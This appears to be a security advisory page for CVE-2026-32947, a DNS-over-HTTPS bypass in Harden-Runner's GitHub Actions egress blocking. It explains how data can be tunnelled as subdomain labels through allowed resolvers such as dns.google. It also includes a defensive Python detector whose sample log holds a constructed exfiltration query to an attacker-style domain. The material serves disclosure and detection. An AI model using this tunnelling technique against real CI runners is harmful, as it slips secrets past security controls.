PT-2026-25988 · Unknown · Harden-Runner

Devanshbatham · Published 2026-03-17 · Updated 2026-03-24 · CVE-2026-32947

CVSS v3.1: 4.9 (Medium)
Vector: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Name of the Vulnerable Software and Affected Versions: Harden-Runner versions 2.15.1 and below

Description: Harden-Runner, a CI/CD security agent that functions as an EDR for GitHub Actions runners, contains a DNS over HTTPS (DoH) bypass. An attacker can circumvent the network restrictions imposed by the egress-policy: block setting by tunneling exfiltrated data through permitted HTTPS endpoints such as dns.google. The attack encodes sensitive data, like the runner's hostname, as subdomains within DoH queries. These queries appear as legitimate HTTPS traffic to Harden-Runner’s domain-based filtering, but the public resolver forwards them to a domain controlled by the attacker, enabling data exfiltration without any direct connection to a blocked destination. Exploitation requires pre-existing code execution within the GitHub Actions workflow. The Enterprise Tier of Harden-Runner is not affected.

Recommendations: Upgrade to Harden-Runner version 2.16.0 or later.
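The description above turns on one observation: a domain allow-list sees only the resolver's hostname, while the data travels in the query name inside the HTTPS request. The following detection heuristic, added here as an example and not part of the advisory or of Harden-Runner's own code, scans a constructed egress log of outbound HTTPS requests, extracts the queried DNS name from DoH requests (both the JSON-style `name=` parameter used by dns.google/resolve and the RFC 8484 `dns=` base64url wire-format parameter), and flags query names whose labels are long and high-entropy, the shape that encoded data takes. The log format, the resolver list and the thresholds are assumptions chosen for the example.

```python
"""Detect DoH-based tunnelling of data in CI egress logs.

Added example; not part of the advisory or of Harden-Runner. Assumed log
format (constructed): "<timestamp> <method> <url>", one outbound request per
line, which is what an egress-inspecting agent would have available.
"""
import base64
import math
import re
from urllib.parse import parse_qs, urlsplit

# Public DoH resolvers often present on HTTPS allow-lists. Assumption:
# illustrative list, not Harden-Runner's own configuration.
DOH_HOSTS = {"dns.google", "cloudflare-dns.com", "dns.quad9.net"}
DOH_PATHS = {"/dns-query", "/resolve"}

# Encoded payload labels tend to be long and close to random; both thresholds
# are assumptions tuned to avoid flagging ordinary hostnames.
MIN_LABEL_LEN = 20
MIN_ENTROPY = 3.5

LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>https://\S+)$")


def shannon_entropy(s):
    """Bits per character of the string s (0.0 for an empty string)."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def qname_from_wire(msg):
    """Extract the first question name from a DNS message in wire format."""
    pos = 12  # fixed 12-byte DNS header precedes the question section
    labels = []
    while pos < len(msg):
        length = msg[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:  # compression pointers do not occur in a query name
            raise ValueError("unexpected compression pointer in question name")
        labels.append(msg[pos:pos + length].decode("ascii", "replace"))
        pos += length
    return ".".join(labels)


def doh_query_name(url):
    """Return the DNS name queried via DoH at url, or None if url is not DoH."""
    parts = urlsplit(url)
    if parts.hostname not in DOH_HOSTS or parts.path not in DOH_PATHS:
        return None
    params = parse_qs(parts.query)
    if "name" in params:  # JSON API style, e.g. dns.google/resolve?name=...
        return params["name"][0].rstrip(".").lower()
    if "dns" in params:  # RFC 8484 GET: base64url-encoded wire-format message
        raw = params["dns"][0]
        msg = base64.urlsafe_b64decode(raw + "=" * (-len(raw) % 4))
        return qname_from_wire(msg).lower()
    return None  # RFC 8484 POST bodies are not visible in a URL-only log


def suspicious_labels(name):
    """Labels of a DNS name that look like encoded data rather than hostnames."""
    return [
        label for label in name.rstrip(".").split(".")
        if len(label) >= MIN_LABEL_LEN and shannon_entropy(label) >= MIN_ENTROPY
    ]


def scan_egress_log(lines):
    """One finding per DoH request; severity 'high' when labels look encoded."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        qname = doh_query_name(m["url"])
        if qname is None:
            continue
        labels = suspicious_labels(qname)
        findings.append({
            "ts": m["ts"],
            "host": urlsplit(m["url"]).hostname,
            "qname": qname,
            "encoded_labels": labels,
            "severity": "high" if labels else "info",
        })
    return findings


# Constructed sample log. The dns= value is the RFC 8484 example query for
# www.example.com; the long label in the last line is arbitrary constructed text.
SAMPLE_LOG = [
    "2026-03-17T10:00:01Z GET https://api.github.com/repos/example/repo",
    "2026-03-17T10:00:02Z GET https://dns.google/dns-query?dns=AAABAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB",
    "2026-03-17T10:00:03Z GET https://dns.google/resolve?name=K7Q2XJ9M4PD3VZ1RB8TLW5.attacker-controlled.example&type=TXT",
]

if __name__ == "__main__":
    for finding in scan_egress_log(SAMPLE_LOG):
        print(finding["severity"], finding["host"], finding["qname"], finding["encoded_labels"])
```

Every DoH request is reported, even with an informational severity, because under an egress-policy of block the resolver itself should not need to be reachable; the high-severity findings are the ones whose query names carry label shapes that ordinary hostnames do not produce. A URL-only log cannot inspect RFC 8484 POST bodies, so an agent that wants full coverage has to see the request body or refuse DoH endpoints outright.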

Exploit

Fix

Weakness Enumeration

Protection Mechanism Failure
Incorrect Authorization

Related Identifiers

CVE-2026-32947
GHSA-46G3-37RH-V698

Affected Products

Harden-Runner